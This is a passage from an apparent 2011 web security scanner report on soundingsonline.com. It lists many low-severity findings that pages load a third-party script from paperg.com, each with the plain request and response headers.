P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.854. http://www.soundingsonline.com/archives

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /archives HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.855. http://www.soundingsonline.com/boat-shop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.856. http://www.soundingsonline.com/boat-shop/know-how

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/know-how

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.857. http://www.soundingsonline.com/boat-shop/new-boats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-boats

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.858. http://www.soundingsonline.com/boat-shop/new-gear

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/new-gear

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.859. http://www.soundingsonline.com/boat-shop/on-powerboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-powerboats

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.860. http://www.soundingsonline.com/boat-shop/on-sailboats

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/on-sailboats

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.861. http://www.soundingsonline.com/boat-shop/q-a-a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/q-a-a

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.862. http://www.soundingsonline.com/boat-shop/sea-savvy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/sea-savvy

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.863. http://www.soundingsonline.com/boat-shop/tech-talk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/tech-talk

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.864. http://www.soundingsonline.com/boat-shop/used-boat-review

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop/used-boat-review

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.865. http://www.soundingsonline.com/calendar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /calendar

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.866. http://www.soundingsonline.com/career-opportunities

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.867. http://www.soundingsonline.com/columns-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.868. http://www.soundingsonline.com/columns-blogs/bay-tripper

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.869. http://www.soundingsonline.com/columns-blogs/books

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.870. http://www.soundingsonline.com/columns-blogs/new-england-fishing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The response dynamically includes the following script from another domain: http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
